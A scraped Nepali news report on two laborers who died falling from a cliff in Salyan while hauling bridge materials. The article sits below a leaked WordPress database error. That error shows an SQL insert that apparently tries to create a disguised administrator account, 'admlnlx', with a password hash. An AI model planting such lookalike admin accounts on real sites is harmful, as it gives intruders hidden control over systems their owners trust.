WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBw1MZAnMeAkgXlXT2vBZK5bxqtRzR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:07', '', 'admlnlx', 'admlnlx')
सल्यान, पुस २६ –
भिरबाट लडेर गए राति दुई मजदुरको मृत्यु भएको छ ।
वामे – ३ बाहुनघाटमा झोलुङ्गे पुल निर्माणमा संलग्न मजदुरको राति करिब ५० मिटर तल खसी घटनास्थलमै मृत्यु भएको हो । मृत्यु हुनेमा कैलाली–६ थापाचौरका ४५ वर्षीय भरथरी चौधरी र ४४ वर्षीय लामारी चौधरी रहेको जिल्ला प्रहरी कार्यालयले जनाएको छ ।
जाजरकोट छेडाबजारबाट पुलको सामान लिई फर्कने क्रममा उनीहरु वामे गाविसको करासी भिरबाट राति १० वजेतिर खसेका थिए । शव परीक्षणका लागि सुर्खेत जिल्ला अस्पतालमा पठाइएको प्रहरीले जनाएको छ । – रासस